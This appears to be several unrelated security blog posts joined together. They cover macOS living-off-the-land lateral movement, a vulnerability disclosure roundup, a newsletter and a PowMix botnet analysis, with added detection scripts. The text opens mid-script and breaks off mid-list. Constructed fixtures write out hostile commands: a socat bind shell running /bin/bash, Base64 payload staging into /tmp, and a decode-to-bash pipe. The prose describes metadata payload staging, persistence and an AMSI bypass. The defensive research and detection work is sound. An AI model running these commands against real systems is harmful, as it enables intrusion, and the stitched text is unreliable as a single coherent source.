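        lineage = {a.name for a in ancestors(p, by_pid)}
        if "Terminal" in lineage and B64_DECODE.search(p.args) and STAGING.search(p.args):
            alerts.append((p.pid, "terminal-base64-stage"))
    return alerts


# Constructed snapshot: launchd, a user's Terminal with one ordinary zsh and one
# staging bash, a socat listener with its child shell, and a normal SSH session.
PROCS = [
    Proc(1, 0, "launchd", "/sbin/launchd"),
    Proc(300, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    Proc(301, 300, "bash", "bash -c echo <base64-payload> | base64 -D > /tmp/.s && chmod +x /tmp/.s"),
    Proc(302, 300, "zsh", "-zsh"),
    Proc(320, 1, "socat", "socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr"),
    Proc(321, 320, "bash", "/bin/bash"),
    Proc(400, 1, "sshd", "sshd: user [priv]"),
    Proc(401, 400, "zsh", "-zsh"),
]

if __name__ == "__main__":
    for pid, rule in detect(PROCS):
        print(f"pid {pid}: {rule}")
```

Rule 1 deliberately ignores the command line: once socat or nc is the parent of a shell, the pty and fork options on the listener are irrelevant to the verdict. Rule 2 is narrower on purpose, since a user decoding Base64 in their own terminal is common; the `chmod +x` into a temporary path is what separates staging from a copy-paste.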
Covert data transfer: Finder metadata abuse
Writing payloads to Finder Comments
A notable constraint of RAS is its inability to write file contents directly. To circumvent this, threat actors can abuse the Finder Comment field (“kMDItemFinderComment”) — a component of Spotlight metadata stored as an extended attribute. By storing a payload within metadata rather than the file's data fork, they can bypass traditional file-based security scanners and static analysis tools, which typically focus on executable code and script contents.
Because Finder is scriptable over RAS, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required:
Figure 9. Setting Finder comments via RAE for payload staging.
The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents.
Extraction and execution
On the target, extraction and execution take a single line. mdls reads the comment, base64 -D decodes it, and the result is piped to “bash”:
Figure 10. Extraction and execution of metadata-stored payloads.
Persistence via LaunchAgent
This approach can be paired with a LaunchAgent for persistence. A plist in “~/Library/LaunchAgents” that executes the extraction chain at user login allows the payload to run automatically.
Our initial attempt using mdls inside the LaunchAgent failed because Spotlight may not be fully initialized when LaunchAgents fire. The fix was to replace mdls with osascript calling Finder directly to read the comment:
Figure 11. Persistence via LaunchAgent and Finder metadata.
Talos confirmed this successfully executes the payload at login. It is worth noting that macOS prompts the user to approve the bash execution at login, which is a visible indicator of background activity. The plist contains no payload, only a reference to metadata, so static analysis of the LaunchAgent would not reveal the malicious content.
Lateral Tool Transfer techniques
Once attackers achieve execution, they must move their toolkit across the environment. Several native protocols were validated for tool transfer (T1570).
Standard protocols: SCP and SFTP
SCP (Secure Copy Protocol) and SFTP (SSH File Transfer Protocol) are the most straightforward methods, operating over SSH and available out-of-the-box on any macOS system with Remote Login enabled.
Figure 12. SCP file transfer syntax.
Figure 13. SFTP file transfer syntax.
SMB-based transfer
Server Message Block (SMB) is a network file sharing protocol commonly associated with Windows environments, but macOS includes native support for both SMB client and server functionality. In a lateral movement context, an attacker can mount a remote SMB share and access its contents as if they were local files.
This method of setting up an SMB share on the victim requires SSH access. The following command creates a shared directory, loads the SMB daemon, and creates the share.
Figure 14. Configuring a native SMB share on macOS.
With the share created, the next step is mounting it from the attacker machine. Attempting this action with the mount command failed due to an authentication error.
Figure 15. Authentication error encountered during SMB mount.
To resolve this issue, GUI access to the victim machine was required. On the victim machine, navigate to System Settings > General > Sharing > File Sharing > Options. Located here is the option to store the user's account password on the computer. Even though this is labeled as "Windows File Sharing", it was required to properly authenticate the user when using the mount utility.
However, this entire GUI dependency can be avoided by using osascript to mount the share instead of mount:
Figure 16. Mounting SMB shares via osascript.
This mounts the share to “/Volumes/share” without requiring the GUI configuration step. With the share mounted, any file copied into the mount directory appears on the victim immediately.
Netcat-based transfer
nc (netcat) is a well-known general-purpose networking utility that ships with macOS. It can be utilized to open arbitrary TCP and UDP connections, listen on ports, and pass data between them.
The simplest pattern involves piping commands directly into a netcat listener. On the target, a listener is established that pipes incoming data directly to sh:
Figure 17. Netcat listener established on victim machine.
From the attacking machine, a command is then echoed into nc targeting the victim's IP and port:
Figure 18. Command execution via Netcat (attacker side).
Figure 19. Command execution via Netcat (victim side).
The attacker sends the curl google.com command over the wire, which is caught by the victim's listener and executed by sh. The resulting output confirms successful execution on the target.
Netcat can also facilitate file transfers through several different methods. An attacker could invoke a fetch to a remote system where a script or payload is hosted, or start a simple HTTP server on their own machine to perform ad hoc tool transfer.
Figure 20. Serving files via netcat (Attacker Terminal 1).
Figure 21. Initiating file transfer via Netcat (Attacker Terminal 2).
Git-based transfer
git is a version control system ubiquitous in software development. Its prevalence on developer machines and reliance on SSH as a transport make git push a practical file transfer mechanism. The technique requires initializing a repository on the target and setting receive.denyCurrentBranch updateInstead. By default, git refuses pushes to a branch that is currently checked out on the remote. This setting overrides that behavior and updates the working tree on push, landing files on disk the moment the operation completes.
First, a receiving repository is initialized on the target over SSH:
Figure 22. Initializing a Git repository on the target.
On the attacker, a local repository is created with the payload, and the remote is pointed at the target:
Figure 23. Pushing payloads to the target via Git.
After the push, “script.sh” exists on the target at “~/repos/project/script.sh”. Additional file transfers only require adding new files, committing, and pushing again. Because git operates over SSH, the transfer is encrypted and uses the same authentication established for command execution.
TFTP (Standard and unprivileged)
TFTP (Trivial File Transfer Protocol) is a lightweight, unauthenticated file transfer protocol that operates over UDP. macOS includes both a TFTP server and client. The server is not active by default but can be started through launchd.
With root access on the target, the system's built-in TFTP plist activates the server in a single command:
Figure 24. Activating the native TFTP server.
This serves “/private/tftpboot” on the standard TFTP port (UDP 69). The TFTP system plist does not provide the -w flag to the tftpd process. Without it, the server only allows writes to files that already exist. A placeholder file must be created on the target for each file being transferred:
Figure 25. Creating a placeholder file for TFTP transfer.
From the attacker, the payload is pushed to the target:
Figure 26. Pushing payload to target via TFTP.
In a post-exploitation scenario without root access, tftpd can still be deployed by loading a user-created plist from “/tmp” on a non-standard port. This variant passes the tftpd -w flag, which allows write requests to create new files, removing the placeholder requirement.
Figure 27. Non-root TFTP server deployment.
SNMP trap-based transfer
SNMP (Simple Network Management Protocol) is used for monitoring and managing network devices. SNMP traps are unsolicited notifications sent from agents to a management station over UDP port 162. The trap payload can carry arbitrary string data under custom OIDs, which can be repurposed as a data transfer channel. macOS ships with the necessary net-snmp tools: snmptrap (“/usr/bin/snmptrap”) on the sender and snmptrapd (“/usr/sbin/snmptrapd”) on the receiver.
The approach works by Base64 encoding a file, splitting it into fixed-size chunks, and sending each chunk as an SNMP trap payload under a custom OID in the private enterprise space (“1[.]3[.]6[.]1[.]4[.]1[.]99999”). A trap handler on the receiving end reassembles the chunks and decodes the file. The protocol uses three message types: “FILENAME” signals the start of a transfer, “DATA” carries a Base64 chunk, and “END” triggers reassembly.
On the receiver, a trap handler processes incoming traps:
Figure 28. SNMP trap handler logic.
The snmptrapd daemon is then configured on the target to route all incoming traps to the handler and started in the foreground:
Figure 29. Configuring the snmptrapd daemon.
On the sender, a script handles the encoding, chunking, and transmission. Each chunk is sent as a separate SNMP trap with a short delay between sends to avoid overwhelming the receiver:
Figure 30. Script for SNMP chunking and transmission.
The sender initiates the transfer:
Figure 31. Initiating data transfer via SNMP traps.
The target receives the transfer:
Figure 32. Successful payload reassembly on target.
The matching MD5 hashes confirm the file was transferred and reassembled intact.
Socat file transfer
The socat shell established in the above “socat remote shell” section can also serve as a file transfer channel. Because the listener provides a fully interactive bash session, file contents can be written to the remote host by injecting a heredoc through the connection. This means socat alone handles both remote command execution and tool transfer without requiring any additional services or listeners.
With the socat listener running on the target, the attacker delivers a file by piping a heredoc-wrapped cat command through a socat connection:
Figure 33. File delivery via socat heredoc injection.
Detection and defensive considerations
Defending against LOTL techniques requires a shift from simple network alerts to granular process and metadata analysis.
Network indicators
Inbound TCP traffic on port 3031 (the “eppc” port) and unusual SNMP/TFTP traffic on internal LAN segments should be monitored for potential unauthorized activity.
Endpoint indicators (EVM)
Through mapping to the Open Cybersecurity Schema Framework (OCSF), an open-source effort to deliver a simplified and vendor-agnostic taxonomy for security telemetry, high-fidelity signatures for these behaviors were identified:
Suspicious lineage: Process trees following the pattern launchd -> AppleEventsD -> Terminal -> sh/bash.
Metadata monitoring: Frequent or unusual calls to mdls or writes to “com.apple.metadata:kMDItemFinderComment”.
Command line anomalies: base64 --decode commands originating from GUI applications or osascript executions containing “of machine "eppc://..."” arguments.
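As an added example (not part of the Talos article or any Talos tooling), the following turns those three indicators into checks over constructed process events. The field names (name, cmdline, ancestors, xattr_writes, user) are simplified stand-ins for OCSF process_activity attributes, and the GUI parent set and the mdls frequency threshold are assumed tuning values.

```python
"""Detection sketch for the three endpoint indicators above.
Added example over constructed events; not Talos code. Field names are
simplified stand-ins for the OCSF attributes a real pipeline would map."""
import re
from collections import Counter

# Lineage called out in the article: launchd -> AppleEventsD -> Terminal -> sh/bash
EPPC_LINEAGE = ("launchd", "AppleEventsD", "Terminal")
SHELLS = {"sh", "bash", "zsh"}
GUI_APPS = {"Terminal", "Finder", "Script Editor"}   # assumed set of GUI parents
FINDER_COMMENT = "kMDItemFinderComment"
FINDER_COMMENT_XATTR = "com.apple.metadata:kMDItemFinderComment"
EPPC_RE = re.compile(r'of\s+machine\s+"eppc://', re.IGNORECASE)
B64_DECODE_RE = re.compile(r"\bbase64\s+(?:--decode|-d|-D)\b")


def has_lineage(ancestors, pattern=EPPC_LINEAGE):
    """True if `pattern` appears as a consecutive run in the ancestor chain
    (root first). The chain need not start at launchd, so truncated trees match."""
    n = len(pattern)
    return any(tuple(ancestors[i:i + n]) == pattern
               for i in range(len(ancestors) - n + 1))


def evaluate(event):
    """Return the indicator names matched by a single process event."""
    hits = []
    name = event["name"]
    cmd = event.get("cmdline", "")
    ancestors = event.get("ancestors", [])
    parent = ancestors[-1] if ancestors else ""

    # 1. Shell under a Terminal that was itself driven by AppleEventsD (RAE/eppc)
    if name in SHELLS and has_lineage(ancestors):
        hits.append("suspicious_lineage")

    # 2. Finder Comment metadata read through mdls or written through its xattr
    if (name == "mdls" and FINDER_COMMENT in cmd) or \
            FINDER_COMMENT_XATTR in event.get("xattr_writes", []):
        hits.append("metadata_monitoring")

    # 3. base64 decode launched from a GUI app, or osascript aimed at a remote machine
    if B64_DECODE_RE.search(cmd) and parent in GUI_APPS:
        hits.append("cmdline_base64_from_gui")
    if name == "osascript" and EPPC_RE.search(cmd):
        hits.append("cmdline_osascript_eppc")
    return hits


def scan(events, mdls_threshold=5):
    """Evaluate every event; additionally raise a per-user alert when mdls is
    invoked `mdls_threshold` times or more (the 'frequent calls to mdls' case)."""
    alerts = []
    mdls_per_user = Counter()
    for idx, ev in enumerate(events):
        if ev["name"] == "mdls":
            mdls_per_user[ev.get("user", "?")] += 1
        for sig in evaluate(ev):
            alerts.append((idx, sig))
    for user, count in mdls_per_user.items():
        if count >= mdls_threshold:
            alerts.append((user, "frequent_mdls"))
    return alerts


# Constructed sample telemetry (not real captures)
SAMPLE_EVENTS = [
    {"user": "alice", "name": "bash", "cmdline": "bash -c 'base64 -D | bash'",
     "ancestors": ["launchd", "AppleEventsD", "Terminal"]},
    {"user": "alice", "name": "mdls",
     "cmdline": "mdls -raw -name kMDItemFinderComment /Users/alice/.cache/readme.txt",
     "ancestors": ["launchd", "AppleEventsD", "Terminal", "bash"]},
    {"user": "bob", "name": "osascript",
     "cmdline": 'osascript -e \'tell application "Finder" of machine "eppc://host.example" to activate\'',
     "ancestors": ["launchd", "zsh"]},
    {"user": "bob", "name": "mdls", "cmdline": "mdls -name kMDItemContentType report.pdf",
     "ancestors": ["launchd", "Terminal", "zsh"]},
    {"user": "bob", "name": "bash", "cmdline": "bash -l",
     "ancestors": ["launchd", "Terminal"]},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```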
Native security controls and hardening recommendations
Several built-in macOS security mechanisms can be configured to mitigate the risks associated with native primitive abuse:
Transparency, Consent, and Control (TCC) restrictions: The "Automation" category within TCC is designed to regulate inter-application communication. By enforcing strict TCC policies via Mobile Device Management (MDM), unauthorized Apple Events between applications — such as a script attempting to control “Terminal.app” or “Finder” — can be blocked.
MDM Policy Enforcement: RAS and Remote Login (SSH) should be disabled by default across the fleet. These services can be managed and restricted using MDM configuration profiles (e.g., the “com.apple.RemoteAppleEvents” payload) to ensure they are only active on authorized administrative hosts.
Service hardening: Unnecessary network-facing services, such as tftpd and snmpd, should be explicitly disabled. The removal of these launchd plists from “/System/Library/LaunchDaemons” (where permitted by System Integrity Protection) or the use of launchctl disable commands prevents their use as ad-hoc data transfer channels.
Application firewall and Stealth Mode: The built-in macOS application firewall should be enabled and configured in "Stealth Mode." This configuration ensures the device does not respond to unsolicited ICMP or connection attempts on common ports, reducing the visibility of the endpoint during internal reconnaissance.
Conclusion
The research presented in this article underscores a fundamental reality of modern endpoint security. The same primitives designed for administrative convenience and system automation are often the most potent tools in an adversary's arsenal. By moving beyond traditional exploit-based attacks and instead living off the land (LOTL), attackers can operate within the noise of legitimate system activity.
From the weaponization of the “eppc” protocol to the creative abuse of Spotlight metadata and SNMP traps, it is clear that the macOS attack surface is both vast and nuanced. These techniques demonstrate that even within a "walled garden" ecosystem, native pathways for movement and execution remain accessible to those who understand the underlying architecture.
For defenders, the primary takeaway is that visibility remains the most effective deterrent. By shifting focus from static file analysis to the monitoring of process lineage, inter-process communication, and metadata anomalies, these "bad Apples" can be identified and neutralized. As macOS continues its expansion into the enterprise core, the documentation and detection of these native techniques must remain a priority for the security community.
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one Foxit Reader vulnerability, and six LibRaw file reader vulnerabilities. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Foxit use-after-free vulnerability
Discovered by KPC of Cisco Talos.
Foxit Reader allows users to view, edit, and sign PDF documents, among other features. Foxit aims to be one of the most feature-rich PDF readers on the market, and contains many similar functions to that of Adobe Acrobat Reader.
TALOS-2026-2365 (CVE-2026-3779) is a use-after-free vulnerability in the way Foxit Reader handles an Array object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
LibRaw heap-based buffer overflow and integer overflow vulnerabilities
Discovered by Francesco Benvenuto of Cisco Talos.
LibRaw is a library and user interface for processing RAW file types and metadata created by digital cameras. Talos analysts found 6 vulnerabilities in LibRaw.
TALOS-2026-2330 (CVE-2026-20911), TALOS-2026-2331 (CVE-2026-21413), TALOS-2026-2358 (CVE-2026-20889), and TALOS-2026-2359 (CVE-2026-24660) are heap-based buffer overflow vulnerabilities in LibRaw, and TALOS-2026-2363 (CVE-2026-24450) and TALOS-2026-2364 (CVE-2026-20884) are integer overflow vulnerabilities. Specially crafted malicious files can lead to heap buffer overflow in all cases. An attacker can provide a malicious file to trigger these vulnerabilities.
Welcome to this week’s edition of the Threat Source newsletter.
The first quarter of 2026 passed faster than a misconfigured firewall rule gets exploited — and the last few weeks have been firmly stamped with the "software supply chain compromise" label, with headlines surrounding incidents involving Trivy, Checkmark, LiteLLM, telnyx and axios. This edition stays focused on vulnerability statistics, although you can view Dave and Nick's Talos blogs for more information about these incidents.
Known Exploited Vulnerabilities (KEVs) stayed roughly in line with 2025 numbers — no dramatic spike, but no room for relief either.
What does stand out? Networking gear accounted for 20% of KEV-related vulnerabilities, and that number is expected to climb as the year progresses. If the trend from 2025 holds, this won't be the high-water mark.
Patch management remains one of the industry's most persistent challenges, and I understand all the operational complexity that comes with it. That said, it still stings to come across CVEs with disclosure dates reaching back to 2009 — and roughly 25% of the CVEs we're tracking date to 2024 or earlier. Old vulnerabilities don't retire. They wait. It starts with visibility: Knowing what's actually running in your environment is the prerequisite for everything else.
Overall CVE counts increased in Q1, with March showing the sharpest climb. Whether that reflects improved disclosure pipelines, increased researcher activity, or a genuine uptick in vulnerability density, the trend line from 2025 hasn't flattened — if anything, it's still pointing up.
Using the keyword methodology described here, 121 CVEs with AI relevance were identified in Q1 — more than Q1 2025, though consistent with what adoption trends would predict. As AI components become more deeply embedded across the software stack, this number will keep climbing.
Given the recent developments with models like the Mythos preview and the industry teaming up in initiatives like Project Glasswing, I'm curious how the trajectory will change moving forward. If you haven't read about it:
“During our testing, we found that Mythos Preview is capable of identifying and then exploiting zero-day vulnerabilities in every major operating system and every major web browser when directed by a user to do so.” -Anthropic Frontier Red Team
That's a substantial capability jump in agentic coding and reasoning, which eventually needs to be implemented early in the development lifecycle. And as Anthony points out, those capabilities will become available to adversaries. Read Cisco's guidance on defending in the age of AI-enabled attacks for more.
Will we see fewer CVEs or even more negative times-to-exploit (TTEs)?
It's on us. Defenders need to get ahead of the adversaries, and at the same time, we need to pay attention to (sometimes decade-old) vulnerabilities.
The one big thing
Cisco Talos has identified a significant increase in the abuse of n8n, an AI workflow automation platform, to facilitate malicious campaigns including malware delivery and device fingerprinting. Attackers are weaponizing the platform’s URL-exposed webhooks to create phishing lures that bypass traditional security filters by leveraging trusted, legitimate infrastructure. By masking malicious payloads as standard data streams, these campaigns effectively turn productivity tools into delivery vehicles for remote access trojans and other cyber threats.
Why do I care?
The abuse of legitimate automation platforms exploits the inherent trust organizations place in these tools, which often neutralizes traditional perimeter-based security defenses. Because these platforms are designed for flexibility and seamless integration, they allow attackers to dynamically tailor payloads and evade detection through standard reputation-based filtering.
So now what?
Move beyond static domain blocking and implement behavioral detection that alerts on anomalous traffic patterns directed toward automation platforms. Restrict endpoint communication with these services to only those explicitly authorized by the organization’s established internal workflows. Finally, utilize AI-driven email security solutions to analyze the semantic intent of incoming messages and proactively share indicators of compromise, such as specific webhook structures, with threat intelligence communities.
Top security headlines of the week
Adobe patches actively exploited zero-day that lingered for months Adobe patched an arbitrary code execution vulnerability in the latest versions of its Acrobat and Reader for Windows and macOS, nearly four months after an attacker first appeared to have begun exploiting it. (Dark Reading)
Fake Claude website distributes PlugX RAT A threat actor created a site that hosts a download link pointing to a ZIP archive allegedly containing a pro version of the LLM. (SecurityWeek)
Sweden blames Russian hackers for attempting “destructive” cyber attack on thermal plant Sweden’s minister of civil defense said during a press conference on Wednesday that the attempted attack happened in early 2025 and attributed the incident to hackers with “connections to Russian intelligence and security services.” (TechCrunch)
FBI and Indonesian police dismantle W3LL phishing network behind $20M fraud attempts The W3LL phishing kit, advertised for a fee of about $500, allowed criminals to mimic legitimate login pages to deceive victims into handing over their credentials, allowing the attackers to seize control of their accounts. (The Hacker News)
Google API keys in Android apps expose Gemini endpoints to unauthorized access Armed with the key, an attacker could access private files and cached content, make arbitrary Gemini API calls, exhaust API quotas and disrupt legitimate services, and access any data on Gemini’s file storage. (SecurityWeek)
Can’t get enough Talos?
More than pretty pictures: Wendy Bishop on visual storytelling in tech From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy talks about the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.
PowMix botnet targets Czech workforce Cisco Talos discovered an ongoing malicious campaign affecting Czech workers with a previously undocumented botnet we call “PowMix.” It employs random beaconing intervals to evade the network signature detections.
APTs: Different objectives, similar access paths Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.”
PowMix employs randomized command-and-control (C2) beaconing intervals, rather than persistent connection to the C2 server, to evade the network signature detections.
PowMix embeds the encrypted heartbeat data along with unique identifiers of the victim machine into the C2 URL paths, mimicking legitimate REST API URLs.
PowMix has the capability to remotely update the new C2 domain to the botnet configuration file dynamically.
Talos observed a few tactical similarities of the current campaign with the ZipLine campaign, including the payload delivery mechanism and the misuse of the legitimate cloud platform Heroku for C2 operations.
Victimology
Talos observed that an attacker targeted Czech organizations across various levels, based on the contents of the lure documents used by the attacker in the current campaign.
Impersonating the legitimate EDEKA brand and authentic regulatory frameworks such as the Czech Data Protection Act, the attacker deploys decoy documents with compliance-themed lures, potentially aimed at compromising victims from human resources (HR), legal, and recruitment agencies. In the lure documents, the attacker also used compensation data, as well as the legitimate legislative references, to enhance the authenticity of these decoy documents and to entice the job aspirants across diverse sectors like IT, finance, and logistics.
Figures 1 (left) and 2 (right). First pages of two decoy documents.
TTPs overlaps with the ZipLine campaign
Talos observed a few tactical similarities employed in the current campaign with that of the ZipLine campaign, reported by researchers from Check Point in August 2025.
In the current campaign, the PowMix botnet payload is delivered via an LNK triggered PowerShell loader that extracts it from a ZIP archive data blob, bypasses AMSI, and executes the decrypted script directly in memory. This campaign shares tactical overlaps with the older ZipLine campaign (which deployed the MixShell malware), including identical ZIP-based payload concealment, Windows-scheduled task persistence, CRC32-based BOT ID generation, and the abuse of “herokuapp.com” for command-and-control (C2) infrastructure. Although there are overlaps in the tactics, the attacker’s final payload was unobserved, and the intent remains unknown in this campaign.
Attack summary
Figure 3. Attack summary flow chart.
The attack begins when a victim runs the Windows shortcut file contained within the received malicious ZIP file, potentially through a phishing email. This shortcut file triggers the execution of an embedded PowerShell loader script, which initially creates a copy of the ZIP file along with its contents in the victim's “ProgramData” folder. Subsequently, it loads the malicious ZIP file, extracts, and executes the embedded PowMix botnet payload directly in the victim's machine memory and starts to communicate with the botnet C2.
PowerShell loader executes PowMix in memory
The first stage PowerShell script functions as a loader, and its execution routine is designed to bypass security controls and deliver a secondary payload. It begins by defining several obfuscated variables, including the file name of the malicious ZIP file that was likely received via a phishing email. Then, the script dynamically constructs paths to folders such as “ProgramData” and the user’s “Downloads” folder to locate this ZIP file. Once the ZIP file is found, it extracts the contents to the “ProgramData” folder, effectively staging the environment for the next phase of the attack.
Figure 4. Excerpt of the deobfuscated PowerShell Loader main function.
To evade detection, the script employs an AMSI (Antimalware Scan Interface) bypass technique. It uses a reflection technique to browse the loaded assemblies in the current process, specifically searching for the AmsiUtils class. Once located, it identifies the amsiInitFailed field and manually sets its value to true. This action deceives the Windows security subsystem into thinking that AMSI has not initialized, which disables real-time scanning of subsequent commands, enabling the script to run malicious code in memory without being detected by Windows Defender or other endpoint detection and response (EDR) solutions.
Figure 5. Excerpt of the deobfuscated PowerShell Loader AMSI bypass function.
The script parses the malicious ZIP file to locate a specific marker that is hardcoded, such as zAswKoK. This marker is treated as a delimiter, enabling the extraction of a hidden, encoded command that is embedded within the ZIP file data blob.
Figure 6. Malicious ZIP file data blob embedded with an obfuscated PowMix botnet.
Throughout this process, the script performs a series of string replacements, which include the removal of # symbols and the mapping of placeholders, such as {cdm}, to their corresponding specific file paths, reconstructing a functional secondary PowerShell script payload. Then it executes the secondary payload script in the victim machine memory using the Invoke-Expression (IEX) PowerShell command.
Figure 7. PowerShell loader excerpt with instructions to extract payload and execute.
PowMix botnet
Talos discovered that the secondary payload PowerShell script, which we call “PowMix,” is a previously unreported botnet designed for remote access, reconnaissance, and remote code execution.
The main execution of the script begins with an environment check to ensure it is running within a specific loader context at the placeholder {cdm}, which is the path of the Windows shortcut in the ProgramData folder, before immediately attempting to conceal its presence. It invokes a function that utilizes the Win32ShowWindowAsync function of “user32.dll” to hide the current PowerShell console window.
Figure 8. PowMix excerpt to hide the PowerShell console window.
Then it decrypts the C2 domain and a configuration file using a custom XOR-based routine with a hardcoded key. It retrieves the machine's product ID by querying the HKLM: SOFTWARE\Microsoft\Windows NT\CurrentVersion registry key for the Windows ProductID. PowMix processes the victim machine’s ProductID and the decrypted configuration data through a CRC32-style checksum function to generate a unique Bot ID and a corresponding Windows schedule task name, which it subsequently uses to establish persistence.
Some of the hardcoded XOR key strings found in this campaign are:
HpSWSb
qDQyxQE
bKUxmhyAe
HymzqLse
KsEYwmgSF
ujCPOEPU
Figure 9. PowMix excerpts with the main function and the function that implements the CRC32 type checksum algorithm.
Instead of using obvious task names, PowMix names the scheduled task by concatenating the Bot ID and Configuration file hash, resulting in names that appear as random hexadecimal strings (such as "289c2e236761”). The task configuration specifies a daily trigger set to execute at 11:00 a.m., and the execution action is configured to launch the benign Windows Explorer binary with the malicious Windows Shortcut file path as an argument. Windows Explorer's file association handling then automatically launches the malicious shortcut file to execute the PowerShell loader script.
Figure 10. Windows scheduled task created by PowMix.
Before attempting to establish persistence, PowMix performs several validation checks to ensure that another instance of the botnet is not running in the infected machine. It examines the process tree using Common Information Model (CIM) queries to identify its parent processes. If the PowMix is not running under either “svchost.exe” or “powershell.exe”, and if certain environmental variables are not set, it attempts to restart itself in the privileged context.
Figure 11. PowMix excerpts with the instructions to establish persistence.
The mutex implementation in the botnet prevents multiple instances from running at the same time. It creates a mutex with the name “Global\[BotID]”. The “Global” prefix makes the mutex visible across all user sessions, stopping separate instances from running in different user sessions.
Figure 12. PowMix excerpts with Mutex creation commands.
PowMix avoids persistent connections to the C2 server. Instead, it implements a jitter via Get-Random PowerShell command to vary the beaconing intervals initially between 0 and 261 seconds, and subsequently between 1,075 and 1,450 seconds. This technique attempts to prevent detection of C2 traffic through predictable network signatures.
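Randomized intervals defeat a fixed-period signature, but the bounded windows described above (0 to 261 seconds at start, then 1,075 to 1,450 seconds) still leave a timing fingerprint. The following is an added example (not Talos code) that scores per-source, per-destination request timing against the steady-state window; the hostnames, IPs, timestamps and both thresholds are constructed values.

```python
"""Beacon-timing score for the jitter windows described in the article.
Added example over constructed records; not Talos code."""
from collections import defaultdict

STEADY_WINDOW = (1075.0, 1450.0)   # seconds, from the article
INITIAL_WINDOW = (0.0, 261.0)      # seconds, from the article


def inter_arrival_gaps(timestamps):
    """Sorted inter-arrival gaps, in seconds, for one (src, dst) pair."""
    ts = sorted(timestamps)
    return [b - a for a, b in zip(ts, ts[1:])]


def window_fraction(gaps, window):
    """Share of gaps falling inside [lo, hi]."""
    lo, hi = window
    if not gaps:
        return 0.0
    return sum(lo <= g <= hi for g in gaps) / len(gaps)


def score_beacons(timestamps, min_gaps=5, min_fraction=0.8):
    """Return (fraction_in_steady_window, verdict).
    min_gaps and min_fraction are assumed tuning values, not article figures:
    a handful of coincidental requests should not trigger on their own."""
    gaps = inter_arrival_gaps(timestamps)
    # Leading gaps inside the 0-261 s startup window belong to the initial
    # phase; drop them so they do not dilute the steady-state ratio.
    lo, hi = INITIAL_WINDOW
    while gaps and lo <= gaps[0] <= hi:
        gaps.pop(0)
    if len(gaps) < min_gaps:
        return 0.0, False
    frac = window_fraction(gaps, STEADY_WINDOW)
    return frac, frac >= min_fraction


def score_log(records, **kw):
    """records: iterable of (src, dst_host, epoch_seconds). Returns
    {(src, dst): (fraction, verdict)} for every pair seen."""
    by_pair = defaultdict(list)
    for src, dst, ts in records:
        by_pair[(src, dst)].append(ts)
    return {pair: score_beacons(ts, **kw) for pair, ts in by_pair.items()}


def _cumulative(start, gaps):
    out, t = [start], start
    for g in gaps:
        t += g
        out.append(t)
    return out


# Constructed records: one host with PowMix-like timing, one with ordinary traffic
_PWM_GAPS = [120, 1100, 1400, 1250, 1340, 1180, 1420]
_BENIGN_GAPS = [300, 600, 5, 2000, 1200, 900]
SAMPLE_RECORDS = (
    [("10.0.0.7", "c2.example", t) for t in _cumulative(1_700_000_000, _PWM_GAPS)]
    + [("10.0.0.9", "cdn.example", t) for t in _cumulative(1_700_000_000, _BENIGN_GAPS)]
)

if __name__ == "__main__":
    for pair, (frac, verdict) in score_log(SAMPLE_RECORDS).items():
        print(pair, f"{frac:.2f}", "BEACON" if verdict else "ok")
```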
Each request from PowMix to C2 is created by concatenating the base C2 domain with the Bot ID, configuration file hash, an encrypted heartbeat, a hexadecimal Unix timestamp, and a random hexadecimal suffix. The standard heartbeat string “[]0” is encrypted using a custom XOR routine using the Bot ID as the key and is then converted to a hex string. The inclusion of a random length hexadecimal suffix further ensures that every URL is unique.
The attacker mimics the REST API calls URLs by embedding these data directly into the URL path, instead of using a URL query string or a POST request for communicating with the C2 server.
Figure 13. C2 URL format.
PowMix establishes a Chrome User-Agent and configures the Accept-Language (en-US) and Accept-Encoding (gzip, deflate, br) headers. It utilizes the GetSystemWebProxy API along with DefaultCredentials to dynamically adopt the host machine’s network proxy settings and automatically authenticates using the logged-in user's active session tokens, thereby disguising the C2 traffic as legitimate web browser traffic within the victim’s environment.
Figure 14. PowMix excerpts with C2 loop instructions.
Figure 15. PowMix excerpts of download function with hardcoded HTTP headers.
PowMix’s command processing logic runs once a response arrives from the C2. The response is split on a period delimiter, the second segment is extracted and decrypted using the unique Bot ID as the XOR key, and the decrypted text is then evaluated by a conditional parser that distinguishes between the command operations hardcoded in the botnet and arbitrary code execution, allowing the attacker to remotely control the victim machine.
The remote management commands that the botnet receives from the C2 are identified by a leading hash symbol (#). We found that the PowMix botnet supports the commands described below:
#KILL - The KILL command initiates a self-deletion routine, using the Unregister-ScheduledTask PowerShell cmdlet with the parameter -Confirm:$false to silently remove persistence, followed by a Remove-Item -Recurse -Force command to wipe the malware’s directory on the victim machine.
#HOST - The HOST command enables C2 infrastructure migration by writing a new C2 URL to a configuration file. On receiving the HOST command, PowMix encrypts the new domain it receives using the hardcoded XOR key and saves it to a local configuration file via the Set-Content PowerShell cmdlet. During the next initialization of the botnet through the scheduled task, it prioritizes the encrypted C2 domain in the local configuration file over the hardcoded defaults, providing a robust mechanism for evading domain blacklisting.
